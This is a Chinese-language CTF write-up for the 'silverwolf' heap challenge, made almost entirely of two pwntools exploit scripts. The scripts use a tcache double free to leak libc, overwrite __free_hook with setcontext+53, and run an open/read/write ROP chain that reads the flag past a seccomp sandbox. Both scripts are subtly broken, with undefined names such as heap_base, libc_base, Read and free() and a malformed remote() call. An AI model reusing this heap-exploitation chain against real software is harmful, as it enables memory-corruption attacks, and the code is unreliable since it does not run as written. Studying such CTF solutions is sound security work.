这个题和看起来像lonewolf,但有沙盒规则,题目给了flag的位置,很显然是用orw来做题,我们先泄露出libc基值,rop中我们注入gadget来进行栈迁移,我们这里利用利用 setcontext 来控制rsp
from pwn import *
context.update(terminal=['tmux','splitw','-h'])
p=process('./silverwolf')
elf=ELF('./libc-2.27.so')
def add(idx,size):
p.recvuntil('Your choice: ')
p.sendline('1')
p.recvuntil('Index: ')
p.sendline(str(idx))
p.recvuntil('Size: ')
p.sendline(str(size))
def edit(idx,content):
p.recvuntil('Your choice: ')
p.sendline('2')
p.recvuntil('Index: ')
p.sendline(str(idx))
p.recvuntil('Content: ')
p.sendline(content)
def show(idx):
p.recvuntil('Your choice: ')
p.sendline('3')
p.recvuntil('Index: ')
p.sendline(str(idx))
def free(idx):
p.recvuntil('Your choice: ')
p.sendline('4')
p.recvuntil('Index: ')
p.sendline(str(idx))
add(0,0x78)
add(0,0x78)
free(0)
edit(0,'aaaaaaaa')
free(0)
show(0)
p.recvuntil('Content: ')
heap_addr=u64(p.recv(6).ljust(8,'\x00'))-0xD0
success('heap_addr :'+hex(heap_addr))
edit(0,p64(heap_addr))
add(0,0x68)
add(0,0x68)
edit(0,p64(0)+p64(0xD1))
add(0,0x78)
add(0,0x78)
for i in range(4):
free(0)
edit(0,'aaaaaaaa')
free(0)
show(0)
p.recvuntil('Content: ')
libc_addr=u64(p.recvuntil('\x7f').ljust(8,'\x00'))-0x3ebca0
free_hook=libc_addr+libc.sym['__free_hook']
payload='a'*0x40+p64(free_hook)+p64(0)+ p64(heap_base + 0x4000) + p64(heap_base + 0x3000 + 0x60)
payload+= p64(heap_base + 0x1000) + p64(heap_base + 0x10A0) + p64(heap_base + 0x3000)
edit(0,payload)
add(0,0x18)
pop_rdi_ret = libc_base + 0x00000000000215bf
pop_rdx_ret = libc_base + 0x0000000000001b96
pop_rax_ret = libc_base + 0x0000000000043ae8
pop_rsi_ret = libc_base + 0x0000000000023eea
ret = libc_base + 0x00000000000008aa
open_addr = libc_base + libc.sym['open']
read_addr = libc_base + libc.sym['read']
write_addr = libc_base + libc.sym['write']
syscall_ret = Read + 15
str_flag_addr = heap_base + 0x4000
gadget = libc_base + libc.sym['setcontext'] + 53
rop_chain = p64(pop_rdi_ret) + p64(str_flag_addr)
rop_chain += p64(pop_rsi_ret) + p64(0)
rop_chain += p64(pop_rax_ret) + p64(2)
rop_chain += p64(syscall_ret)
rop_chain += p64(pop_rdi_ret) + p64(3)
rop_chain += p64(pop_rsi_ret) + p64(heap_base + 0x3000)
rop_chain += p64(pop_rdx_ret) + p64(0x30)
rop_chain += p64(read_addr)
rop_chain += p64(pop_rdi_ret) + p64(1)
rop_chain += p64(write_addr)
edit(0,p64(gadget))
add(0,0x38)
edit(0,'./flag\x00')
add(0,0x78)
edit(0,rop_chain[:0x60])
add(0,0x48)
edit(0,rop_chain[0x60:])
add(0,0x68)
edit(0,p64(heap_base + 0x3000) + p64(pop_rdi_ret + 1))
add(0,0x58)
free(0)
p.interactive()
沙盒规划,泄露libc和方式和lonewolf类似,利用orw来进行注入
from pwn import *
context.terminal=["gnome-terminal",'-x','sh','-c']
p=remote=("")
libc = ELF('./libc-2.27.so')
def add(size):
p.recvuntil("Your choice: ")
p.sendline("1")
p.recvuntil("Index: ")
p.sendline('0')
p.recvuntil("Size: ")
p.sendline(str(size))
def delete():
p.recvuntil("Your choice: ")
p.sendline("4")
p.recvuntil("Index: ")
p.sendline('0')
def edit(c="a"):
p.recvuntil("Your choice: ")
p.sendline("2")
p.recvuntil("Index: ")
p.sendline('0')
p.recvuntil("Content: " )
p.sendline(c)
def show():
p.recvuntil("Your choice: ")
p.sendline(3)
p.recvuntil("Index: ")
p.sendline('0')
p.recvuntil("Content: ")
add(0x70)
delete()
edit(p64(0)+'a')
delete()
show()
heap_addr=u64(p.recv(6)+'\x00'*2)-0x260
edit(p64(heap_addr+0x10))
add(0x70)
add(0x70)
edit('\x07'*0x40)
delete()
show()
libc_base = u64( p.recvuntil('\x7f')[-6:].ljust(8,'\x00'))-0x3ebca0
pop_rdi_ret = libc_base + 0x00000000000215BF
pop_rdx_ret = libc_base + 0x0000000000001B96
pop_rax_ret = libc_base + 0x0000000000043AE8
pop_rsi_ret = libc_base + 0x0000000000023EEA
ret = libc_base + 0x00000000000008AA
Open = libc_base + libc.sym['open']
Read = libc_base + libc.sym['read']
Write = libc_base + libc.sym['write']
syscall = Read + 15
FLAG = heap_base + 0x4000
gadget = libc_base + libc.sym['setcontext'] + 53
orw = p64(pop_rdi_ret) + p64(FLAG)
orw += p64(pop_rsi_ret) + p64(0)
orw += p64(pop_rax_ret) + p64(2)
orw += p64(syscall)
orw += p64(pop_rdi_ret) + p64(3)
orw += p64(pop_rsi_ret) + p64(heap_base + 0x3000)
orw += p64(pop_rdx_ret) + p64(0x30)
orw += p64(Read)
orw += p64(pop_rdi_ret) + p64(1)
orw += p64(Write)
edit(p64(gadget))
add(0x38)
edit('./flag\x00')
add(0x78)
edit(orw[:0x60])
add(0x48)
edit(orw[0x60:])
add(0x68)
edit(p64(heap_base + 0x3000) + p64(pop_rdi_ret + 1))
add(0x58)
free()
p.interactive()